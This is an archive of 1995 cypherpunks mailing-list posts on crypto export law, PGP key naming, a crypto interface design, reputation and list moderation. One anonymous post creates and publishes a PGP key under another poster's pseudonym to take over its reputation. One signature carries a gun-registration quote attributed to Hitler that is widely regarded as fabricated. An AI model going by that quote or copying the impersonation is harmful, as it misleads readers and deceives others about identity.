Phill <hallam@w3.org> wrote:

<snip + slight reformat>

>If you make it a party issue you will not only lose but risk turning the 
>clock the other way. At the moment everyone knows that the export control 
>laws are not stopping people from getting PGP. It is not a good idea to
>rub peoples noses in it.

Why not? It gets the issue talked about when it otherwise wouldn't be.
The cypherpunks are the Dr. Kevorkians of stupid US export laws.

>It is easy to ignore export violations by turning a blind eye. It is 
>difficult to turn a blind eye when people are so anxious to announce what
>is going on.

Exactly. I plan to go to the Nandotimes article at URL
http://www2.nando.net/newsroom/ntn/info/info429_4.html
and see what it looks like with a few substitutions like
"cars," "highways," and "doorlocks" for words like "encode"
or "encrypt." Sarcasm is often the last refuge libertarians
have in these humor-impaired times, but it keeps me sane. :)

>Phil Z. is not having problems because he wrote PGP, he
>is having problems because he made sure the FBI couldn't pretend they
>did not know what was going on.

Well, not exactly. I believe from what I've seen here before that
it was Kelly Goen(sp?) who did this. Of course, I've advocated
everyone taking legal responsibility for Kelly's actions as a kind
of protest against creeping Naziism in "our" government (see my
"An Old Idea" post, buried somewhere in the c-punk archives).

>If you make encryption a party issue then one of those Grassley bills
>will pass and the President in power may not veto it.

Encryption _IS_ a party issue, and quite possibly an effective one
if we used it correctly, for the *Libertarian* Party! The actions
of both "major" parties would have been [IMO] bad PR if the media
decided to do their jobs (I know, big "if"). There is, of course, 
institutional L. party resistance to putting the individual right
to strong encryption on the "front burner" because our "generals,"
despite a consistent record of losing battles, insist on fighting
the last war (that is, when we aren't busy fighting eachother).
<sigh>
JMR

 [Who takes this opportunity to remind SO FL cypherpunks of the
  party at 7:30PM on Wed. Nov. 29th.]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMLMw9m1lp8bpvW01AQEYggP/R/2nI8TurElr/c1haz6XNzWhUjVxZXtG
bQRs9FkHX54300G5tYW1BSe37eQ+5AT6LyjjljLdtx4nYKUSDRUHqYCs/qQkspOU
jFxfTAV8TOwMaopL4odBfgDeBVBhXRcjtsYu2rQ6WFF759TCTVYpxjhr7B8JDnR8
LoTFhEBAdTk=
=wBjX
-----END PGP SIGNATURE-----
Regards, Jim Ray --  http://www.shopmiami.com/prs/jimray

 "This year will go down in history, for the first time a civilized
  nation has full gun registration!  Our streets will be safer, our
  police more efficient, and the world will follow our lead in the
  future." -- Adolf Hitler, 1935

-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 02:16:53 +0800
To: cypherpunks@toad.com
Subject: key for Alice as promised
Message-ID: <199511221754.JAA19505@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, I wrote:

> On Tue, 21 Nov 1995, Russell Nelson wrote:
> 
> > anonymous-remailer@shell.portal.com writes:
> > > Alice here ...
> > 
> > How do we know this for a fact?
> 
> We don't.
> 
> As an incentive for Alice to generate herself a PGP key, I hereby
> place Alice on notice that if she doesn't sign her next post, and
> provide a PGP key, I will create one for her, and steal all the
> postive (?) reputation that she has developed so far.
> 
> You have 24 hours Alice, otherwise a key gets posted to here, and to
> the keyservers with your nym on it.

Well 24 hours have passed, and Alice remains unrepentant:

On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:

> Alice here ...
> 
> No, *I* am the real Alice, and I refuse to use PGP signing.

So here we go Alice's key:

Type bits/keyID    Date       User ID
pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks@toad.com>
          Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCzCFsAAAEEAKR2yXr+FeTjjR0YdGboF9KN4nxTRJ1STZ0CEsL5gTHQcCEo
+ELfT2ejkFFtoW9y8c1b6YVItstdPTBZ4TomzM2h1bgToKRn0vRliO4DpOF1J1sZ
+2PJwSK22OGIIvSTKf15S7vxRRa6Xnw5IM3WzU5lIrh1OwH7RIbu8OQjKS7RAAUR
tClBbGljZSBkZSAnbm9ueW1vdXMgPGN5cGhlcnB1bmtzQHRvYWQuY29tPokAlQMF
EDCzCdqG7vDkIyku0QEBW2sD/REBXmnHJ6Nr/xEUoJGr3CbH9voIGQkkzINplsrk
koqXlI9puVkBkPUtTMnsewDyUumRR54ZDQ+sApi7rYa/DsSpWbiDaDC1kS5qKHT+
gfBfIxCkEt3Zjzot8vWKJgpC4GY5WC7q5bkmqcfrBNBctl5aWI1lD1qV6iIZ/9fW
2PEA
=h413
- -----END PGP PUBLIC KEY BLOCK-----

Anything posted without being signed by the above key isn't from me.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLNjIIbu8OQjKS7RAQETOAQAjLmudAEP/z61BylOtyFhCif5U/BrQ2Pd
uWLdy12Z16YVpczNEXeHDztsIE1BTNeGrb85OJywqc3G0M5WU9zzIRY+QlgPJzzJ
CFx5danXzVr5A6Bmp2TponUZ4mE1qNoDfANlHMt4nSV1Fn4JqU89sJx7WSmQE0o5
KlPw3Yo4E48=
=eOri
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 00:04:07 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


This discussion puzzles me.  I thought we were bombarded with 
reputational goods all the time:  brand names, stocks (what is a purchase 
in the 2ndary market but a purchase of reputation most of the time?), 
degrees from famous universities.  Anonymity compliates matters only if 
no systems of unique ID is used.  Throw in digital signatures and we are 
back at brand names, aren't we?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 00:00:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Spam the Sign!
In-Reply-To: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122100156.22711E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[regarding suggestion that netscape give mit or someone a 128 bit version 
to place on an ftp server]

This is not an apology for the the ITAR, just my usual lawyerly overcaution:

Suppose A gives B a program that is export controlled, intending for B to 
allow it to be exported.  Has A conspired with B to export the program?

Let's ask the grand jury investigating Phil....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 02:56:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511221809.KAA21408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Romania or Bulgaria, or even Russia. They may still have
> the old listening infrastructure in place, although I
> hear that Stasi headquarters in the former DDR is now an
> acupuncture clinic.

The Stasi listening infrastructure wasn't solely in their
headquarters. Listening stations for terrestrial frequencies were
spread along the borders, notably here is the station on the Brocken,
a mountain in the Harz. The central station for interception of
satellite traffic (read: international telephone communication, even
when not entering or leaving the country) was located in Biesenthal, a
small town near Berlin.

It's hard to reconstruct what part of interception took place in the
Stasi HQ, my guess is that all international telephone traffic leaving
or entering the country was intercepted there. For technical reasons
it was impossible to intercept all domestic traffic from a single
central location, the telephone system worked on a purely mechanical
basis. It seems that almost all of the telephone surveillance
equipment was destroyed during the revolution or shortly after.

Things look different for the mentioned radio equipment. The Stasi
used a combination of Russian and self-made technology. The
top-of-the-notch Russian equipment is back in Russia. But most of the
Russian equipment was sold by the Russian guards (their pay is
_really_ low, even more so when compared to western money), the Stasi
equipment was forgotten about and eventually stolen. This equipment is
now mainly in the hands of about 3 or 4 individuals.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 23 Nov 1995 02:50:14 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221641.AA14712@tis.com>
Message-ID: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> >From: Raph Levien <raph@c2.org>
>
> >   I propose that the new interface lives as a sort of daemon, rather
> >than a static collection of command line script pieces. 
> 
> Danger, Will Robinson!  (see below)

   In restrospect, "daemon" was a poor choice of words to describe my
proposal. "Slave process" gets the idea across much better, but may be a
bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
socket. The slave process is only accessible to the user who invoked it
(enforced by the OS's file permissions). Further, it only gives secrets to
individual processes that authenticated themselves first (by sending a
passphrase down the connection to the slave process). 

> >   Once the negotation has been established, the application can send
> >the daemon MIME objects that the app does not understand but the
> >daemon does (for example, an image/fractal). The daemon can return a
> >MIME object that the app does understand (for example, an image/ppm).
> 
> This part sounds good...a sort of master translation service.

   I'm glad you like it!

> >   Alternatively, the daemon may request an authentication. This is
> >useful when resolving external bodies that require authentication,
> >including non-anonymous FTP, and standard authenticated HTTP. In this
> >case, the daemon sends a message to the app requesting the
> >authentication. It specifies whether it needs both username and
> >password, or just password. In the latter case, it hands a username to
> >the application.
> >   The application can then query the user for the authentication
> >data. It hands this back to the daemon. In reply, the daemon indicates
> >success or failure. In case of success, it hands the object back to
> >the app.
> 
> Now I get worried.  This communication with the demon is via some IPC --
> maybe even via a LAN.  Some things can't be distributed safely and
> authentication is #2 on my list.

   No, the communication is not via a LAN. On a Unix system, the 
communication is through Domain Sockets. Both processes live on the same 
machine, and the socket "lives" on the local file system.

   I submit that my proposal is every bit as secure as, say, PGP is now. 
If you can't trust the operating system not to hand domain sockets from 
one process to another, then you certainly can't trust it to, for 
example, substitute different binaries for the crypto program (an attack 
which Ian et al cleverly mounted a few weeks ago).
   If it were not the case that my proposal was as secure as PGP, then I 
would want to withdraw it. However, the proposal has so many advantages 
that I would want to see a serious description of the attack, rather than 
just feelings of endangerment to Will Robinson.

> >   Encryption is a bit more tricky, but in essence you just hang a
> >premail-alike off this kind of protocol. The hard part is specifying
> >the key, but you just call it a "parameter" and put in hooks for the
> >daemon to ask for whatever parameters it needs. 
> 
> Crypto keys are #1 on my list of things you can't distribute (unless they
> are wrapped, of course).

   I should have made it cleaer that I am referring to public keys. If 
public keys are on the list of things that can't be distributed, then I 
believe we are in trouble.

> >						 This requires that
> >keys have some nonforgeable names, which is unfortunately not a
> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >Certifcation Authority (<wink> at Nick Szabo).
> 
> Public keys, if that's what you're talking about, have perfectly good
> nonforgeable names -- themselves.  They are unique.  They are the proper
> name which can collect all the attributes of that key which are of interest
> (e.g., permission to spend $, name of a human who knows the private key,
> attributes about that human, etc.).

   Ok. But public keys have one serious disadvantage: their size. I can't 
put a public key on my business card or read it over the phone. I want a 
unforgeable key name. I want this to be the standard key name in the 
interface between the application and the crypto engine. I want users to 
be able to specify them directly, at the very least to bootstrap the 
public key infrastructure.
   I propose using the MD5 hash of the whitespace-free MOSS 
representation of the public key, in hex. It's simple enough to be 
described in one sentence, but does everything I want.

   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
name of a public key, unless you do a horrible hack such as replace the 
pubring.pgp file with the one public key of interest. This is a 
significant problem when trying to identify which key signed a signed 
message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
will allow this either. I got the impression that it preferred the use of 
an alias.

> >   One final aside: I've been fairly frustrated with this mailing list
> >as a forum for talking about real design proposals and implementation
> >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> >tend to attract far more attention than real crypto work. I want a
> >forum for, and just for, cypherpunks who write code. If I had just a
> >smidgen more free time (as if), I'd be trying to start one
> >myself. Anyone else?
> 
> I've seen this happen several times.  As a list gets popular, it
> diversifies.  You might try sci.crypt.research -- since it's moderated.

   Thanks for the suggestion. However, my concerns are with 
implementation and deployment, not research.  I am perfectly willing to 
consider cryptographic algorithms to be black boxes that do what they say 
they will. I think the charter exists to start a new list. John Gilmore 
has already offered to start a "coderpunks" list on toad.com. Shall we 
take him up on it?

Raph






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 23 Nov 1995 04:59:14 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221840.AA24587@tis.com>
Message-ID: <Pine.SUN.3.91.951122111513.7498C-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
> >From: Raph Levien <raph@c2.org>
> >Subject: Re: Design proposal: crypto-capable generic interface
> >Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
> 
> 
> 
> >   In restrospect, "daemon" was a poor choice of words to describe my
> >proposal. "Slave process" gets the idea across much better, 
> 
> I'm a great fan of programming by cooperating processes -- but I still
> worry when it comes to crypto.  What we need to do, if we want real
> security, is hold all the crypto secrets (therefore the crypto itself) in a
> device (PCMCIA card?)  in the physical posession of the user.  The
> cooperating-process model could make that easier -- but, if designed wrong,
> it could call for the device to give up a secret to be sent by IPC over to
> the slave process.

   What I am getting from you is "worry." This does not convince me. I
want solid technical criticism. Sorry for being so harsh, but that's how I
feel. 

   In fact, I propose that the security of the "slave process" model is
_better_ than the realistic alternatives. Without it, the application
stuff (for example, displaying pretty MIME content) and the crypto stuff
must share an address space. A bug in the application stuff could corrupt
or compromise the crypto data structures. As we have seen demonstrated
several times, it is just not practical to build large, complex
applications which are worthy of the highest level of trust. Factoring it 
into two processes helps.

   Tokens are nice, but I think there's a lot to be said for software 
solutions as well. At the very least, I don't consider the existence of 
tokens to be an argument that software crypto systems shouldn't be built.

> >> >						 This requires that
> >> >keys have some nonforgeable names, which is unfortunately not a
> >> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >> >Certifcation Authority (<wink> at Nick Szabo).
> >> 
> >> Public keys, if that's what you're talking about, have perfectly good
> >> nonforgeable names -- themselves.  They are unique.  They are the proper
> >> name which can collect all the attributes of that key which are of interest
> >> (e.g., permission to spend $, name of a human who knows the private key,
> >> attributes about that human, etc.).
> >
> >   Ok. But public keys have one serious disadvantage: their size. 
> [...]
> 
> >   I propose using the MD5 hash of the whitespace-free MOSS 
> >representation of the public key, in hex. It's simple enough to be 
> >described in one sentence, but does everything I want.
> 
> That sounds fine -- but why deal with a text MOSS representation?  It's the
> modulus which is unique -- so just hash the binary bytes of the modulus,
> MSB first.  There's no need to force anyone checking a key to have all the
> MOSS printing software in the loop.  You might also consider using SHA
> instead of MD5 -- but that adds to the character count on your business
> card.  [I printed up my own business cards with PGP fingerprints for my 2
> primary keys -- and it took up about 1/4 of the card, in a readable font.]

   I would accept SHA as a reasonable alternative.

   Using the modulus alone is not good enough. A bogus key with the same 
modulus and a different exponent could be used to mount a 
denial-of-service attack. Note that the PGP 2.6.2 key fingerprint scheme 
suffers from a similar problem; since the sizes of the modulus and 
exponent fields are not included in the hash, it is possible to generate 
bogus keys with the same fingerprint. Specifying the key size and 
fingerprint together is, however, unforgeable.

I looked at the MOSS representation of the key (I'm talking PK's here
only, not all the X.509 stuff). I don't think it would be that hard to
code. 

> >   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> >name of a public key, unless you do a horrible hack such as replace the 
> >pubring.pgp file with the one public key of interest.
> 
> PGP keyring structures do use the key as its own name, I believe.  The
> UserID is a separate entity, associated with the stand-alone key.  A
> signature applies to a pair (UserID,Key).

   I was referring to the interface that PGP presents to the outside 
world, not its internal keyring structures. These issues come up whenever 
using PGP from the command line, or trying to interface it with other 
applications.

> If I could change the PGP keyring structure, I'd add a new entity -- an
> Attribute block -- a string and my key ID, with a signature on the
> Attribute+ObjectKey.  This can be done today with the UserID and signature
> -- and I've even tried it.  It works, but PGP is used to accessing keys by
> the text in a UserID field and that's not appropriate.  The Attribute would
> give a statement I'm prepared to stand by, giving testimony about the key
> being signed or the person who has demonstrated the ability to sign
> something I've verified with that key.

   I understand that Matt Blaze's forthcoming "Policymaker" will do all 
this and more.

> We might need to add something like MOSS's aliases, for my use only, to let
> me access keys.  If I know someone as Bobby -- that's an association in my
> own head -- not applicable to anyone else.  When I access him by that
> alias, that's for my use.  Therefore, only I should define it and only I
> should sign the association.  This is what I'd use instead of PGP's
> UserID blocks -- alias blocks.
> 
> I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
> the alias structure not only to define nicknames of importance only to me
> but also to define crypto-lists (like mailing lists).
> 
> Needless to say, the assignment of aliases needs to be protected.  An
> attacker mustn't be allowed to slip a new alias and/or new key into your
> ring -- especially if it's a crypto-list definition.

   This is fine, but it's one more thing to manually maintain. How is the 
user going to verify that the alias is really right? This is another 
place where a 32- (or 40-) hex digit unique name would come in handy.

> >   Thanks for the suggestion. However, my concerns are with 
> >implementation and deployment, not research.  I am perfectly willing to 
> >consider cryptographic algorithms to be black boxes that do what they say 
> >they will. I think the charter exists to start a new list. John Gilmore 
> >has already offered to start a "coderpunks" list on toad.com. Shall we 
> >take him up on it?
> 
> My suggestion is that if you want this limited in content, it'll have to be
> moderated.

   I agree that a moderated list would be better, but I do not have the
time do it myself.
   One suggestion that I think is very good is to moderate on the basis 
on the basis of sender, rather than message. The best way to do this 
would be to keep a keyring of "approved" senders, and match the signature 
of each message against the keyring. As I say, I'm not volunteering, but 
if somebody else was so moved, I think it would be a valuable service.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Thu, 23 Nov 1995 02:07:10 +0800
To: cypherpunks@toad.com
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511221739.LAA28319@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain



N> When I tried this URL I got:

N> 404 Not Found

N> The requested URL /newsroom/ntn/info/info429_4.html was not found on
N> this server.

	Nando seems to be having problems - I got the same error several
times following links on it.


-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 23 Nov 1995 04:21:54 +0800
To: tallpaul <tallpaul@pipeline.com>
Subject: Re: Secrets of the Internet
In-Reply-To: <199511221933.OAA12393@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.951122113850.23852D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, tallpaul wrote:
>  
> Turing killed himself after being dogged by the UK's intelligence
> establishment over his sexual orientation. Ain't no way they're going to
> unfreeze *him* to work on the issue of "kiddie porn."

You still believe that cover story? :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 23 Nov 1995 02:47:39 +0800
To: froomkin@law.miami.edu
Subject: Re: Spam the Sign!
Message-ID: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>[regarding suggestion that netscape give mit or someone a 128 bit version 
>to place on an ftp server]
>
>This is not an apology for the the ITAR, just my usual lawyerly overcaution:
>
>Suppose A gives B a program that is export controlled, intending for B to 
>allow it to be exported.  Has A conspired with B to export the program?
>
>Let's ask the grand jury investigating Phil....

That's a possible problem, I suppose, but wouldn't you be protected if
your license agreement with MIT (or whoever) specified redistribution
"for domestic use only"?


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 23 Nov 1995 05:00:59 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <199511222024.MAA09897@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't have time to write much now, but I got a request for information
on the Prisoner's Dilemma problem, so I did a web search, and found an
interesting sounding paper at <URL:
http://www.cs.wisc.edu/~smucker/ipd-cr/ipd-cr.html>.  I have not read it
yet, but according to the web page this adds to the traditional PD
simulations the feature that participants can choose whom to interact
with (rather than having to interact with everyone or with a random other
program).  Maybe "reputation" would be more important in such a
simulation since the element of choice seems to be one of the key areas
where reputation matters.  I'll try to read the paper over the holidays,
but it sounds like it might be relevant.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 03:08:15 +0800
To: A.Back@exeter.ac.uk
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <5579.199511221742@olib>
Message-ID: <199511221828.NAA21403@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



A.Back@exeter.ac.uk writes:
> It is much more efficient of list bandwidth to post short pointers
> only, of the style John Young <jya@pipeline.com> posts.

I agree with you.  John's posts are not always strictly on topic but
they are always just pointers, and he typically posts them in a single
group a day. They are also always very high quality information. I
find them to be perfectly fine. 

The recent "Friend;" stuff just annoyed me, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 23 Nov 1995 03:11:00 +0800
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
Message-ID: <9511221840.AA24587@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
>From: Raph Levien <raph@c2.org>
>Subject: Re: Design proposal: crypto-capable generic interface
>Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>



>   In restrospect, "daemon" was a poor choice of words to describe my
>proposal. "Slave process" gets the idea across much better, 

I'm a great fan of programming by cooperating processes -- but I still
worry when it comes to crypto.  What we need to do, if we want real
security, is hold all the crypto secrets (therefore the crypto itself) in a
device (PCMCIA card?)  in the physical posession of the user.  The
cooperating-process model could make that easier -- but, if designed wrong,
it could call for the device to give up a secret to be sent by IPC over to
the slave process.


>> >						 This requires that
>> >keys have some nonforgeable names, which is unfortunately not a
>> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>> >Certifcation Authority (<wink> at Nick Szabo).
>> 
>> Public keys, if that's what you're talking about, have perfectly good
>> nonforgeable names -- themselves.  They are unique.  They are the proper
>> name which can collect all the attributes of that key which are of interest
>> (e.g., permission to spend $, name of a human who knows the private key,
>> attributes about that human, etc.).
>
>   Ok. But public keys have one serious disadvantage: their size. 
[...]

>   I propose using the MD5 hash of the whitespace-free MOSS 
>representation of the public key, in hex. It's simple enough to be 
>described in one sentence, but does everything I want.

That sounds fine -- but why deal with a text MOSS representation?  It's the
modulus which is unique -- so just hash the binary bytes of the modulus,
MSB first.  There's no need to force anyone checking a key to have all the
MOSS printing software in the loop.  You might also consider using SHA
instead of MD5 -- but that adds to the character count on your business
card.  [I printed up my own business cards with PGP fingerprints for my 2
primary keys -- and it took up about 1/4 of the card, in a readable font.]

>   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
>name of a public key, unless you do a horrible hack such as replace the 
>pubring.pgp file with the one public key of interest.

PGP keyring structures do use the key as its own name, I believe.  The
UserID is a separate entity, associated with the stand-alone key.  A
signature applies to a pair (UserID,Key).

If I could change the PGP keyring structure, I'd add a new entity -- an
Attribute block -- a string and my key ID, with a signature on the
Attribute+ObjectKey.  This can be done today with the UserID and signature
-- and I've even tried it.  It works, but PGP is used to accessing keys by
the text in a UserID field and that's not appropriate.  The Attribute would
give a statement I'm prepared to stand by, giving testimony about the key
being signed or the person who has demonstrated the ability to sign
something I've verified with that key.

We might need to add something like MOSS's aliases, for my use only, to let
me access keys.  If I know someone as Bobby -- that's an association in my
own head -- not applicable to anyone else.  When I access him by that
alias, that's for my use.  Therefore, only I should define it and only I
should sign the association.  This is what I'd use instead of PGP's
UserID blocks -- alias blocks.

I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
the alias structure not only to define nicknames of importance only to me
but also to define crypto-lists (like mailing lists).

Needless to say, the assignment of aliases needs to be protected.  An
attacker mustn't be allowed to slip a new alias and/or new key into your
ring -- especially if it's a crypto-list definition.


>   Thanks for the suggestion. However, my concerns are with 
>implementation and deployment, not research.  I am perfectly willing to 
>consider cryptographic algorithms to be black boxes that do what they say 
>they will. I think the charter exists to start a new list. John Gilmore 
>has already offered to start a "coderpunks" list on toad.com. Shall we 
>take him up on it?

My suggestion is that if you want this limited in content, it'll have to be
moderated.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme          |
 |Trusted Information Systems, Inc.   http://www.tis.com/                   |
 |3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
 |Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
 +--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Thu, 23 Nov 1995 04:13:58 +0800
To: cypherpunks@toad.com
Subject: PROPOSAL: cypherpunks-news@toad.com?
Message-ID: <9510228170.AA817074264@cc3.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On 11/22/95, Adam Writes:
     
     > Perry Metzger <perry@piermont.com> writes:
     > > "James M. Cobb" writes:
     > > > Friend, 
     > > >  
     > > >  
     > > > The following information from 
     > > 
     > > 1) You are not my friend.
     > > 
     > > 2) My private mail to you hasn't convinced you to stop this
     > > barrage of reposts. Would you please do so?
     
     > I am inclined to agree with Perry in as much as the volume of posts 
     > to the cypherpunks list is greatly increased by reposts of news from 
     > other mailing lists, USENET newsgroups, WWW sources, newspapers, TV 
     > programs, films, books, talks, etc.  While some of the information
     > posted is interesting, and relevant, some others are less relevant, 
     > bordering on noise.
     
     [SNIP]
     
     > The proposal: a separate list for current-event
     > reports/news/reposts.
     
     [SNIP]
     
     > What do others think?
     
     > Adam
     
     This is what I think about setting up an additional list:
     
     1. If I subscribe to both lists, it won't change my eMail traffic
     
     2. If the "news, NOISE, off-topic" posts are sent to both lists, my 
     eMail volume will increase
     
     3. The cypherpunks subscribers are not the problem
     
     4. What Adam and Perry (and others) want is that the "news, NOISE, 
     off-topic" posters change their behavior and not post long news items 
     verbatim.
     
     5. How are you going to get those posters to agree to change?
     
     My vote, for what it's worth, is don't split the list.  It won't work 
     because the extra posts ARE going to go to this list because that's 
     where they believe their readers are.
     
     Martin G. Diehl
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 23 Nov 1995 04:42:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Secrets of the Internet
Message-ID: <199511221933.OAA12393@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed. 22 Nov 1995 Simon Spero wrote in "Re:SEcrets of the Internet" that
we should "never underestimate the power of GCHQ -- when they unfreeze Alan
Turing from the cryogenic vault, good things happen." 
 
Not to worry. 
 
Turing killed himself after being dogged by the UK's intelligence
establishment over his sexual orientation. Ain't no way they're going to
unfreeze *him* to work on the issue of "kiddie porn."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 04:36:28 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Spam the Sign!
In-Reply-To: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Frank Stuart wrote:

> >[regarding suggestion that netscape give mit or someone a 128 bit version 
> >to place on an ftp server]
> >
> >This is not an apology for the the ITAR, just my usual lawyerly overcaution:
> >
> >Suppose A gives B a program that is export controlled, intending for B to 
